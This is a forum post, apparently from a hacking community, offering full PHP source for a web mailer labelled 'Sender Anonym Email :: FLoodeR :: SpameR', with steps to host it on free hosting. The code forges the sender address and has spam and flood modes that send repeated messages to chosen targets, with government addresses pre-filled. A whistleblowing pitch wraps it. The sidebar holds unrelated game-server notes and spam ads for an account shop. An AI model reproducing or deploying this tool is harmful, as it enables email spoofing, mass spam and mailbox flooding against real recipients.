Jump to content

Recommended Posts

Posted

Do you want to send an email anonymously because, for example, you fear your views might not be appreciated by your boss? When avouching your opinion in public — critically important under more favorable circumstances — is unhealthy, anonymity becomes vital. Here i will show you how to setup your own anonymous email service. I am writing this post because there are some things that must be said, even when the speaker must remain anonymous. Lets start:

 

1. First of all you need to find a free hosting service that supports PHP and SendMail. Here is one that works perfect, and without ads: x10hosting.com. Create an account there.

 

2. Now open notepad and paste this PHP code

[tt]<?

/*

© h4wl3ry

*/

?>

<title>Sender Anonym Email :: FLoodeR :: SpameR</title>

<?

//

error_reporting (0);

if(!set_time_limit(0)) {

$limit = false;

} else {

set_time_limit(0);

ignore_user_abort(1);

$limit = true;

}

$log = 'log.txt'; // Log fileini_set('max_execution_time', '0');

?>

set_time_limit(0) = <?if($limit)echo('<font color=Green>On</font>');else

echo('<font color=Red>Off</font> (Working time is limited with the current settings of the server)');?><br>

<?$ip = getenv('REMOTE_ADDR');

if($_GET['mail'] == '1' || $_GET['mail'] == '2' || $_GET['mail'] == '3')

{

$_POST['to'] = stripslashes($_POST['to']);

$_POST['msg'] = stripslashes($_POST['msg']);

$_POST['from'] = stripslashes($_POST['from']);

$_POST['subject'] = stripslashes($_POST['subject']);if($_POST['to'] && $_POST['msg'] && $_POST['from'] && $_POST['tipe'])

{

$headers = "MIME-Version: 1.0\r\n";

$headers .= "Content-type: text/".$_POST['tipe']."; charset=windows-1251\r\n";

$headers .= "From: ".$_POST['from']."\n";

if($_GET['mail'] == '1')

{

mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message');

}

elseif($_GET['mail'] == '2')

{

$_POST['to'] = explode("\n",$_POST['to']);

foreach($_POST['to'] as $poluchatels)

{

mail($poluchatels, $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message');

}

}

elseif($_GET['mail'] == '3')

{

if(preg_match('/[0-9]+/',$_POST['kol']))

{

for($i=0;$i<$_POST['kol'];$i++)

{

mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message');

sleep(1);

}

}

else

{

echo('Incorrect (or not entered) number of messages');

}

}

$f = fopen($log,'a');

fwrite($f,'Message sent &'.$_POST['msg'].'& with subject "'.$_POST['subject'].'" for "'.$_POST['to'].'" from IP - "'.$ip."\"\r\n");

fclose($f);

echo('<center><b><font color="green">Message succesfully sent</font></b></center>');

}

else

{

?>

<form style="width:350px" method='post'>

<?

if($_GET['mail'] == '1' || $_GET['mail'] == '3')

{

echo("Receiver  <input type='text'name='to'><br>");

}

?>

Sender <input type='text' name='from'><br>

Subject  <input type='text' name='subject'><br>

<?

if($_GET['mail'] == '3')

{

echo("Amount of messages <input type='text' name='kol'><br>");

}

?>

<br>

htm -> <input type='radio' checked='checked' tabindex='1' name='tipe' value='html'> :: <input type='radio' name='tipe' value='plain'><- text<br>

<?

if($_GET['mail'] == '2')

{

echo("Receivers<br><textarea name='to' rows='10' cols='30'>admin@fbi.org

admin@cia.org

admin@whitehouse.org</textarea>");

}

?>

<br>Message<br>

<textarea name='msg' rows='10' cols='30'></textarea><br><br><input type='submit'>

</form>

<?

}

} else {

?><br>

<a href='<?=$_SERVER['PHP_SELF']?>?mail=1'>Send simple message</a><br>

<a href='<?=$_SERVER['PHP_SELF']?>?mail=2'>Spam</a><br>

<a href='<?=$_SERVER['PHP_SELF']?>?mail=3'>Flood</a><br>

<?

}

[/tt]

 

3. Save it everywhere u want as mail.php, then upload it in your host you created (x10hosting) via FTP.

 

4. Now we are done. Just go at yourname.x10hosting.com/mail.php, and start sending your fake emails.

 

Why sending anonymous emails is important:

 

* Anonymously report sensitive information to the media

* Send crime tips to law enforcement agencies anonymously

* Report wrongdoing or theft at the workplace

* Voice concerns to school principals anonymously

* Report child or any other abuse

* Initiate an anonymous chat discussion

* Share suspicions regarding a friend or loved one

 

have fun!!!!!

  • 2 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



  • Posts

    • just with this extender that I have shared it is not possible to start with c4 client, you have to make some changes to the extender and it works with c4 client perfectly. regarding the updates in this last revision   🔹dll is not packaged with vmprotect   New custom zone types have been added: 🔹 NO_NOBLESS begin MinX=84638 MaxX=92616 MinY=-87170 MaxY=-82018 MinZ=-6000 MaxZ=0 Type=NO_NOBLESS KickOutPos=83007/148057/-3464 end   ▶️ This zone checks if the character is noble. If it does not meet the condition, it will be automatically kicked to the indicated position (KickOutPos). 🔹 CUSTOM_SPAWN_ZONE begin MinX=77275 MaxX=85704 MinY=10122 MaxY=18066 MinZ=-8000 MaxZ=5000 Type=CUSTOM_SPAWN_ZONE OutPos=83007/148057/-3464 Spawns={{82984/18066/-5256}};{{79275/15147/-5248}};{{82922/14263/-5256}};{{83704/10122/-5288}} end ▶️ This zone allows characters, upon death, to respawn with full buff, CP, HP and MP if they press “Fixed”. They will only be able to revive in one of the positions defined in Spawns. 🔧 Both zones are fully configurable from territorydata.txt
    • Could you tell me what changed in this update?   more one question: Is it possible to log in through the c4 client instead of interlude? That would be great  
    • ➡ Discount for your purchase: JULY2025 (11% discount) ➡ Our Online Shop: https://socnet.store  ➡ Our SMM-Boosting Panel: https://socnet.pro  ➡ Telegram Shop Bot: https://socnet.shop  ➡ Telegram Support: https://t.me/solomon_bog  ➡ Telegram Channel: https://t.me/accsforyou_shop  ➡ Discord Support: @AllSocialNetworksShop  ➡ Discord Server: https://discord.gg/y9AStFFsrh  ➡ WhatsApp Support: https://wa.me/79051904467 ➡ WhatsApp Channel: https://whatsapp.com/channel/0029Vau0CMX002TGkD4uHa2n  ➡ Email Support: solomonbog@socnet.store 
    • ➡ Discount for your purchase: JULY2025 (11% discount) ➡ Our Online Shop: https://socnet.store  ➡ Our SMM-Boosting Panel: https://socnet.pro  ➡ Telegram Shop Bot: https://socnet.shop  ➡ Telegram Support: https://t.me/solomon_bog  ➡ Telegram Channel: https://t.me/accsforyou_shop  ➡ Discord Support: @AllSocialNetworksShop  ➡ Discord Server: https://discord.gg/y9AStFFsrh  ➡ WhatsApp Support: https://wa.me/79051904467 ➡ WhatsApp Channel: https://whatsapp.com/channel/0029Vau0CMX002TGkD4uHa2n  ➡ Email Support: solomonbog@socnet.store 
  • Topics

×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock